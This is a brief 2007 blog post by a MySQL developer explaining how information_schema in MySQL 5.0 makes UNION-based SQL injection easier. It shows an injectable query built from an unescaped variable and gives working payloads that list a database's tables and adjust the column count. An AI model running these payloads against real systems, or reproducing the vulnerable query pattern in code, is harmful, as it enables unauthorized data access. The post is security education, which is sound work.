Morgan Tocker (![[info]](http://l-stat.livejournal.com/img/userinfo.gif){kind=small} mtocker) wrote,@ 2007-12-15 15:22:00 |
|
| Entry tags: | mysql, php |
I [heart] information_schema
With MySQL 5.0, it's much easier to do SQL Injection attacks, because you can use UNION against information schema. You couldn't do this with the old SHOW commands.
i.e.
SELECT * FROM users WHERE id = $id;
becomes:
SELECT * FROM users WHERE id = 0 UNION SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() group by table_schema;
The rules to a union in MySQL is that the second query must match the same number of columns as the first query. In this case, you can just keep changing it till you get the column count right:
SELECT group_concat(table_name), 1, 2, 3, 4 FROM information_schema.tables WHERE table_schema=DATABASE() group by table_schema;
I presented on these types of attacks here
